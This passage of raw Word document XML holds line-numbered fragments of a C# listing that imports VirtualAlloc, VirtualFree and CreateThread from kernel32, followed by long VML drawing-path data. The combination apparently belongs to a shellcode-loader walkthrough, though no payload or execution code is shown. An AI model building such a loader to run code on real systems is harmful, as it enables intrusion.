        <w:spacing w:before="28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96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DllImport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(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"kernel32"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]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97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private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static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extern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UInt32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VirtualAlloc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UInt32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lpStartAddr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14" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="290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98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UInt32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size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UInt32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flAllocationType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="17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UInt32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flProtect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;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99</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="28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100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DllImport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(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"kernel32"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]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101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private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static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extern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0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bool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VirtualFree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IntPtr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lpAddress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14" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5451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102</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="25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UInt32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dwSize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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UInt32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dwFreeType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;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103</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="28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104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DllImport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(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"kernel32"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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="316" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="449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105</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="25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private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="3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static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extern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IntPtr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CreateThread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(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106</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="58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107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UInt32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lpThreadAttributes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,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108</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="25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UInt32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="3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dwStackSize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,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109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UInt32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lpStartAddress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,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110</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="1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IntPtr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param</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,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111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UInt32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dwCreationFlags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,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112</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21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ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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UInt32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="28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lpThreadId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454.200pt;margin-top:719.400pt;width:7.200pt;height:7.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId15" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:669.811pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,13396">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:13396" coordorigin="10402,0" coordsize="0,13396" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,4,10402,5,10402,7,10402,10,10402,13,10402,17,10402,21,10402,26,10402,32,10402,39,10402,46,10402,54,10402,63,10402,73,10402,84,10402,96,10402,109,10402,124,10402,139,10402,156,10402,174,10402,193,10402,214,10402,236,10402,260,10402,285,10402,312,10402,340,10402,370,10402,402,10402,436,10402,471,10402,508,10402,547,10402,588,10402,632,10402,677,10402,724,10402,773,10402,825,10402,879,10402,935,10402,993,10402,1054,10402,1117,10402,1183,10402,1251,10402,1322,10402,1396,10402,1472,10402,1551,10402,1632,10402,1717,10402,1804,10402,1894,10402,1987,10402,2083,10402,2183,10402,2285,10402,2390,10402,2499,10402,2611,10402,2726,10402,2845,10402,2967,10402,3092,10402,3221,10402,3353,10402,3489,10402,3629,10402,3772,10402,3919,10402,4070,10402,4224,10402,4383,10402,4545,10402,4711,10402,4882,10402,5056,10402,5234,10402,5417,10402,5604,10402,5795,10402,5990,10402,6190,10402,6394,10402,6602,10402,6815,10402,7033,10402,7255,10402,7482,10402,7713,10402,7949,10402,8190,10402,8436,10402,8686,10402,8942,10402,9202,10402,9468,10402,9738,10402,10014,10402,10294,10402,10580,10402,10872,10402,11168,10402,11470,10402,11777,10402,12090,10402,12408,10402,12732,10402,13061,10402,13396e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:350" coordorigin="1490,970" coordsize="8990,350" path="m1510,999l1510,999,1510,999,1510,999,1510,999,1510,999,1510,999,1511,999,1512,999,1512,999,1514,999,1515,999,1517,999,1519,999,1521,999,1524,999,1528,999,1532,999,1536,999,1541,999,1546,999,1552,999,1559,999,1566,999,1575,999,1583,999,1593,999,1603,999,1615,999,1627,999,1640,999,1654,999,1668,999,1684,999,1701,999,1719,999,1738,999,1758,999,1780,999,1802,999,1826,999,1851,999,1877,999,1904,999,1933,999,1963,999,1995,999,2028,999,2063,999,2099,999,2136,999,2175,999,2216,999,2259,999,2303,999,2348,999,2396,999,2445,999,2496,999,2549,999,2604,999,2660,999,2719,999,2779,999,2841,999,2906,999,2972,999,3041,999,3112,999,3184,999,3259,999,3336,999,3416,999,3498,999,3582,999,3668,999,3757,999,3848,999,3941,999,4037,999,4136,999,4236,999,4340,999,4446,999,4555,999,4666,999,4780,999,4897,999,5017,999,5139,999,5264,999,5392,999,5523,999,5657,999,5793,999,5933,999,6076,999,6222,999,6370,999,6522,999,6677,999,6835,999,6997,999,7161,999,7329,999,7500,999,7675,999,7853,999,8034,999,8219,999,8407,999,8598,999,8793,999,8992,999,9194,999,9400,999,9609,999,9823,999,10039,999,10260,999,10484,999,10484,999,10484,999,10484,999,10484,999,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1002,10484,1003,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1007,10484,1008,10484,1009,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1014,10484,1015,10484,1016,10484,1017,10484,1019,10484,1020,10484,1021,10484,1023,10484,1024,10484,1025,10484,1027,10484,1029,10484,1030,10484,1032,10484,1034,10484,1036,10484,1038,10484,1040,10484,1042,10484,1044,10484,1046,10484,1048,10484,1051,10484,1053,10484,1056,10484,1058,10484,1061,10484,1064,10484,1067,10484,1070,10484,1073,10484,1076,10484,1079,10484,1082,10484,1085,10484,1089,10484,1092,10484,1096,10484,1100,10484,1104,10484,1108,10484,1112,10484,1116,10484,1120,10484,1124,10484,1129,10484,1133,10484,1138,10484,1142,10484,1147,10484,1152,10484,1157,10484,1162,10484,1167,10484,1173,10484,1178,10484,1184,10484,1190,10484,1195,10484,1201,10484,1207,10484,1214,10484,1220,10484,1226,10484,1233,10484,1240,10484,1246,10484,1253,10484,1260,10484,1267,10484,1275,10484,1282,10484,1290,10484,1297,10484,1305,10484,1313,10484,1321,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10483,1330,10482,1330,10482,1330,10480,1330,10479,1330,10477,1330,10475,1330,10473,1330,10470,1330,10466,1330,10462,1330,10458,1330,10453,1330,10448,1330,10442,1330,10435,1330,10428,1330,10419,1330,10411,1330,10401,1330,10391,1330,10379,1330,10367,1330,10354,1330,10340,1330,10326,1330,10310,1330,10293,1330,10275,1330,10256,1330,10236,1330,10215,1330,10192,1330,10168,1330,10143,1330,10117,1330,10090,1330,10061,1330,10031,1330,9999,1330,9966,1330,9931,1330,9895,1330,9858,1330,9819,1330,9778,1330,9735,1330,9691,1330,9646,1330,9598,1330,9549,1330,9498,1330,9445,1330,9391,1330,9334,1330,9275,1330,9215,1330,9153,1330,9088,1330,9022,1330,8953,1330,8883,1330,8810,1330,8735,1330,8658,1330,8578,1330,8497,1330,8413,1330,8326,1330,8238,1330,8146,1330,8053,1330,7957,1330,7859,1330,7758,1330,7654,1330,7548,1330,7439,1330,7328,1330,7214,1330,7097,1330,6977,1330,6855,1330,6730,1330,6602,1330,6471,1330,6337,1330,6201,1330,6061,1330,5918,1330,5773,1330,5624,1330,5472,1330,5317,1330,5159,1330,4997,1330,4833,1330,4665,1330,4494,1330,4319,1330,4141,1330,3960,1330,3776,1330,3587,1330,3396,1330,3201,1330,3002,1330,2800,1330,2594,1330,2385,1330,2172,1330,1955,1330,1734,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1329,1510,1329,1510,1329,1510,1329,1510,1329,1510,1329,1510,1329,1510,1329,1510,1329,1510,1328,1510,1328,1510,1328,1510,1328,1510,1327,1510,1327,1510,1327,1510,1326,1510,1326,1510,1325,1510,1325,1510,1324,1510,1324,1510,1323,1510,1323,1510,1322,1510,1321,1510,1321,1510,1320,1510,1319,1510,1318,1510,1317,1510,1316,1510,1315,1510,1314,1510,1313,1510,1312,1510,1311,1510,1309,1510,1308,1510,1307,1510,1305,1510,1304,1510,1302,1510,1300,1510,1299,1510,1297,1510,1295,1510,1293,1510,1291,1510,1289,1510,1287,1510,1285,1510,1283,1510,1281,1510,1278,1510,1276,1510,1273,1510,1271,1510,1268,1510,1265,1510,1262,1510,1260,1510,1257,1510,1253,1510,1250,1510,1247,1510,1244,1510,1240,1510,1237,1510,1233,1510,1229,1510,1226,1510,1222,1510,1218,1510,1214,1510,1209,1510,1205,1510,1201,1510,1196,1510,1192,1510,1187,1510,1182,1510,1177,1510,1172,1510,1167,1510,1162,1510,1156,1510,1151,1510,1145,1510,1140,1510,1134,1510,1128,1510,1122,1510,1116,1510,1109,1510,1103,1510,1096,1510,1090,1510,1083,1510,1076,1510,1069,1510,1062,1510,1054,1510,1047,1510,1039,1510,1032,1510,1024,1510,1016,1510,1008,1510,999e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,330">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:330" coordorigin="1490,990" coordsize="30,330" path="m1517,999l1517,999,1517,999,1517,999,1517,999,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1002,1517,1003,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1005,1517,1006,1517,1007,1517,1007,1517,1008,1517,1009,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1014,1517,1015,1517,1016,1517,1017,1517,1019,1517,1020,1517,1021,1517,1023,1517,1024,1517,1025,1517,1027,1517,1029,1517,1030,1517,1032,1517,1034,1517,1036,1517,1038,1517,1040,1517,1042,1517,1044,1517,1046,1517,1048,1517,1051,1517,1053,1517,1056,1517,1058,1517,1061,1517,1064,1517,1067,1517,1070,1517,1073,1517,1076,1517,1079,1517,1082,1517,1085,1517,1089,1517,1092,1517,1096,1517,1100,1517,1104,1517,1108,1517,1112,1517,1116,1517,1120,1517,1124,1517,1129,1517,1133,1517,1138,1517,1142,1517,1147,1517,1152,1517,1157,1517,1162,1517,1167,1517,1173,1517,1178,1517,1184,1517,1190,1517,1195,1517,1201,1517,1207,1517,1214,1517,1220,1517,1226,1517,1233,1517,1240,1517,1246,1517,1253,1517,1260,1517,1267,1517,1275,1517,1282,1517,1290,1517,1297,1517,1305,1517,1313,1517,1321,1517,1330e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:65.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1310" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:1310;width:8990;height:370" coordorigin="1490,1310" coordsize="8990,370" path="m1510,1330l1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1511,1330,1512,1330,1512,1330,1514,1330,1515,1330,1517,1330,1519,1330,1521,1330,1524,1330,1528,1330,1532,1330,1536,1330,1541,1330,1546,1330,1552,1330,1559,1330,1566,1330,1575,1330,1583,1330,1593,1330,1603,1330,1615,1330,1627,1330,1640,1330,1654,1330,1668,1330,1684,1330,1701,1330,1719,1330,1738,1330,1758,1330,1780,1330,1802,1330,1826,1330,1851,1330,1877,1330,1904,1330,1933,1330,1963,1330,1995,1330,2028,1330,2063,1330,2099,1330,2136,1330,2175,1330,2216,1330,2259,1330,2303,1330,2348,1330,2396,1330,2445,1330,2496,1330,2549,1330,2604,1330,2660,1330,2719,1330,2779,1330,2841,1330,2906,1330,2972,1330,3041,1330,3112,1330,3184,1330,3259,1330,3336,1330,3416,1330,3498,1330,3582,1330,3668,1330,3757,1330,3848,1330,3941,1330,4037,1330,4136,1330,4236,1330,4340,1330,4446,1330,4555,1330,4666,1330,4780,1330,4897,1330,5017,1330,5139,1330,5264,1330,5392,1330,5523,1330,5657,1330,5793,1330,5933,1330,6076,1330,6222,1330,6370,1330,6522,1330,6677,1330,6835,1330,6997,1330,7161,1330,7329,1330,7500,1330,7675,1330,7853,1330,8034,1330,8219,1330,8407,1330,8598,1330,8793,1330,8992,1330,9194,1330,9400,1330,9609,1330,9823,1330,10039,1330,10260,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1331,10484,1331,10484,1331,10484,1331,10484,1331,10484,1332,10484,1332,10484,1332,10484,1333,10484,1333,10484,1333,10484,1334,10484,1334,10484,1335,10484,1335,10484,1336,10484,1337,10484,1337,10484,1338,10484,1339,10484,1340,10484,1340,10484,1341,10484,1342,10484,1343,10484,1344,10484,1345,10484,1347,10484,1348,10484,1349,10484,1350,10484,1352,10484,1353,10484,1355,10484,1356,10484,1358,10484,1360,10484,1361,10484,1363,10484,1365,10484,1367,10484,1369,10484,1371,10484,1374,10484,1376,10484,1378,10484,1381,10484,1383,10484,1386,10484,1388,10484,1391,10484,1394,10484,1397,10484,1400,10484,1403,10484,1406,10484,1409,10484,1413,10484,1416,10484,1420,10484,1423,10484,1427,10484,1431,10484,1435,10484,1439,10484,1443,10484,1448,10484,1452,10484,1456,10484,1461,10484,1466,10484,1470,10484,1475,10484,1480,10484,1485,10484,1491,10484,1496,10484,1502,10484,1507,10484,1513,10484,1519,10484,1525,10484,1531,10484,1537,10484,1543,10484,1550,10484,1556,10484,1563,10484,1570,10484,1577,10484,1584,10484,1591,10484,1599,10484,1606,10484,1614,10484,1622,10484,1630,10484,1638,10484,1646,10484,1655,10484,1663,10484,1672,10484,1681,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10483,1690,10482,1690,10482,1690,10480,1690,10479,1690,10477,1690,10475,1690,10473,1690,10470,1690,10466,1690,10462,1690,10458,1690,10453,1690,10448,1690,10442,1690,10435,1690,10428,1690,10419,1690,10411,1690,10401,1690,10391,1690,10379,1690,10367,1690,10354,1690,10340,1690,10326,1690,10310,1690,10293,1690,10275,1690,10256,1690,10236,1690,10215,1690,10192,1690,10168,1690,10143,1690,10117,1690,10090,1690,10061,1690,10031,1690,9999,1690,9966,1690,9931,1690,9895,1690,9858,1690,9819,1690,9778,1690,9735,1690,9691,1690,9646,1690,9598,1690,9549,1690,9498,1690,9445,1690,9391,1690,9334,1690,9275,1690,9215,1690,9153,1690,9088,1690,9022,1690,8953,1690,8883,1690,8810,1690,8735,1690,8658,1690,8578,1690,8497,1690,8413,1690,8326,1690,8238,1690,8146,1690,8053,1690,7957,1690,7859,1690,7758,1690,7654,1690,7548,1690,7439,1690,7328,1690,7214,1690,7097,1690,6977,1690,6855,1690,6730,1690,6602,1690,6471,1690,6337,1690,6201,1690,6061,1690,5918,1690,5773,1690,5624,1690,5472,1690,5317,1690,5159,1690,4997,1690,4833,1690,4665,1690,4494,1690,4319,1690,4141,1690,3960,1690,3776,1690,3587,1690,3396,1690,3201,1690,3002,1690,2800,1690,2594,1690,2385,1690,2172,1690,1955,1690,1734,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1689,1510,1689,1510,1689,1510,1689,1510,1689,1510,1689,1510,1689,1510,1688,1510,1688,1510,1688,1510,1688,1510,1687,1510,1687,1510,1687,1510,1686,1510,1686,1510,1685,1510,1685,1510,1684,1510,1683,1510,1683,1510,1682,1510,1681,1510,1681,1510,1680,1510,1679,1510,1678,1510,1677,1510,1676,1510,1675,1510,1674,1510,1673,1510,1672,1510,1670,1510,1669,1510,1668,1510,1666,1510,1665,1510,1663,1510,1661,1510,1660,1510,1658,1510,1656,1510,1654,1510,1652,1510,1650,1510,1648,1510,1646,1510,1644,1510,1641,1510,1639,1510,1636,1510,1634,1510,1631,1510,1628,1510,1626,1510,1623,1510,1620,1510,1617,1510,1613,1510,1610,1510,1607,1510,1603,1510,1600,1510,1596,1510,1592,1510,1588,1510,1584,1510,1580,1510,1576,1510,1572,1510,1568,1510,1563,1510,1559,1510,1554,1510,1549,1510,1544,1510,1539,1510,1534,1510,1529,1510,1523,1510,1518,1510,1512,1510,1507,1510,1501,1510,1495,1510,1489,1510,1482,1510,1476,1510,1470,1510,1463,1510,1456,1510,1449,1510,1442,1510,1435,1510,1428,1510,1421,1510,1413,1510,1405,1510,1398,1510,1390,1510,1381,1510,1373,1510,1365,1510,1356,1510,1348,1510,1339,1510,1330e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:65.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1310" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:1310;width:30;height:370" coordorigin="1490,1310" coordsize="30,370" path="m1517,1330l1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1331,1517,1331,1517,1331,1517,1331,1517,1331,1517,1332,1517,1332,1517,1332,1517,1333,1517,1333,1517,1333,1517,1334,1517,1334,1517,1335,1517,1335,1517,1336,1517,1337,1517,1337,1517,1338,1517,1339,1517,1340,1517,1340,1517,1341,1517,1342,1517,1343,1517,1344,1517,1345,1517,1347,1517,1348,1517,1349,1517,1350,1517,1352,1517,1353,1517,1355,1517,1356,1517,1358,1517,1360,1517,1361,1517,1363,1517,1365,1517,1367,1517,1369,1517,1371,1517,1374,1517,1376,1517,1378,1517,1381,1517,1383,1517,1386,1517,1388,1517,1391,1517,1394,1517,1397,1517,1400,1517,1403,1517,1406,1517,1409,1517,1413,1517,1416,1517,1420,1517,1423,1517,1427,1517,1431,1517,1435,1517,1439,1517,1443,1517,1448,1517,1452,1517,1456,1517,1461,1517,1466,1517,1470,1517,1475,1517,1480,1517,1485,1517,1491,1517,1496,1517,1502,1517,1507,1517,1513,1517,1519,1517,1525,1517,1531,1517,1537,1517,1543,1517,1550,1517,1556,1517,1563,1517,1570,1517,1577,1517,1584,1517,1591,1517,1599,1517,1606,1517,1614,1517,1622,1517,1630,1517,1638,1517,1646,1517,1655,1517,1663,1517,1672,1517,1681,1517,1690e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:83.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1670" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1670;width:8990;height:390" coordorigin="1490,1670" coordsize="8990,390" path="m1510,1690l1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1511,1690,1512,1690,1512,1690,1514,1690,1515,1690,1517,1690,1519,1690,1521,1690,1524,1690,1528,1690,1532,1690,1536,1690,1541,1690,1546,1690,1552,1690,1559,1690,1566,1690,1575,1690,1583,1690,1593,1690,1603,1690,1615,1690,1627,1690,1640,1690,1654,1690,1668,1690,1684,1690,1701,1690,1719,1690,1738,1690,1758,1690,1780,1690,1802,1690,1826,1690,1851,1690,1877,1690,1904,1690,1933,1690,1963,1690,1995,1690,2028,1690,2063,1690,2099,1690,2136,1690,2175,1690,2216,1690,2259,1690,2303,1690,2348,1690,2396,1690,2445,1690,2496,1690,2549,1690,2604,1690,2660,1690,2719,1690,2779,1690,2841,1690,2906,1690,2972,1690,3041,1690,3112,1690,3184,1690,3259,1690,3336,1690,3416,1690,3498,1690,3582,1690,3668,1690,3757,1690,3848,1690,3941,1690,4037,1690,4136,1690,4236,1690,4340,1690,4446,1690,4555,1690,4666,1690,4780,1690,4897,1690,5017,1690,5139,1690,5264,1690,5392,1690,5523,1690,5657,1690,5793,1690,5933,1690,6076,1690,6222,1690,6370,1690,6522,1690,6677,1690,6835,1690,6997,1690,7161,1690,7329,1690,7500,1690,7675,1690,7853,1690,8034,1690,8219,1690,8407,1690,8598,1690,8793,1690,8992,1690,9194,1690,9400,1690,9609,1690,9823,1690,10039,1690,10260,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1691,10484,1691,10484,1691,10484,1691,10484,1691,10484,1692,10484,1692,10484,1692,10484,1693,10484,1693,10484,1693,10484,1694,10484,1694,10484,1695,10484,1695,10484,1696,10484,1696,10484,1697,10484,1698,10484,1699,10484,1699,10484,1700,10484,1701,10484,1702,10484,1703,10484,1704,10484,1705,10484,1706,10484,1708,10484,1709,10484,1710,10484,1712,10484,1713,10484,1714,10484,1716,10484,1718,10484,1719,10484,1721,10484,1723,10484,1725,10484,1727,10484,1729,10484,1731,10484,1733,10484,1736,10484,1738,10484,1740,10484,1743,10484,1746,10484,1748,10484,1751,10484,1754,10484,1757,10484,1760,10484,1763,10484,1766,10484,1770,10484,1773,10484,1776,10484,1780,10484,1784,10484,1788,10484,1791,10484,1795,10484,1800,10484,1804,10484,1808,10484,1813,10484,1817,10484,1822,10484,1827,10484,1831,10484,1836,10484,1842,10484,1847,10484,1852,10484,1858,10484,1863,10484,1869,10484,1875,10484,1881,10484,1887,10484,1893,10484,1899,10484,1906,10484,1912,10484,1919,10484,1926,10484,1933,10484,1940,10484,1948,10484,1955,10484,1963,10484,1970,10484,1978,10484,1986,10484,1994,10484,2003,10484,2011,10484,2020,10484,2028,10484,2037,10484,2046,10484,2056,10484,2065,10484,2065,10484,2065,10484,2065,10484,2065,10484,2065,10484,2065,10483,2065,10482,2065,10482,2065,10480,2065,10479,2065,10477,2065,10475,2065,10473,2065,10470,2065,10466,2065,10462,2065,10458,2065,10453,2065,10448,2065,10442,2065,10435,2065,10428,2065,10419,2065,10411,2065,10401,2065,10391,2065,10379,2065,10367,2065,10354,2065,10340,2065,10326,2065,10310,2065,10293,2065,10275,2065,10256,2065,10236,2065,10215,2065,10192,2065,10168,2065,10143,2065,10117,2065,10090,2065,10061,2065,10031,2065,9999,2065,9966,2065,9931,2065,9895,2065,9858,2065,9819,2065,9778,2065,9735,2065,9691,2065,9646,2065,9598,2065,9549,2065,9498,2065,9445,2065,9391,2065,9334,2065,9275,2065,9215,2065,9153,2065,9088,2065,9022,2065,8953,2065,8883,2065,8810,2065,8735,2065,8658,2065,8578,2065,8497,2065,8413,2065,8326,2065,8238,2065,8146,2065,8053,2065,7957,2065,7859,2065,7758,2065,7654,2065,7548,2065,7439,2065,7328,2065,7214,2065,7097,2065,6977,2065,6855,2065,6730,2065,6602,2065,6471,2065,6337,2065,6201,2065,6061,2065,5918,2065,5773,2065,5624,2065,5472,2065,5317,2065,5159,2065,4997,2065,4833,2065,4665,2065,4494,2065,4319,2065,4141,2065,3960,2065,3776,2065,3587,2065,3396,2065,3201,2065,3002,2065,2800,2065,2594,2065,2385,2065,2172,2065,1955,2065,1734,2065,1510,2065,1510,2065,1510,2065,1510,2065,1510,2065,1510,2065,1510,2065,1510,2065,1510,2065,1510,2065,1510,2065,1510,2065,1510,2065,1510,2065,1510,2065,1510,2064,1510,2064,1510,2064,1510,2064,1510,2064,1510,2064,1510,2063,1510,2063,1510,2063,1510,2062,1510,2062,1510,2062,1510,2061,1510,2061,1510,2060,1510,2060,1510,2059,1510,2058,1510,2058,1510,2057,1510,2056,1510,2055,1510,2055,1510,2054,1510,2053,1510,2052,1510,2051,1510,2050,1510,2049,1510,2047,1510,2046,1510,2045,1510,2043,1510,2042,1510,2040,1510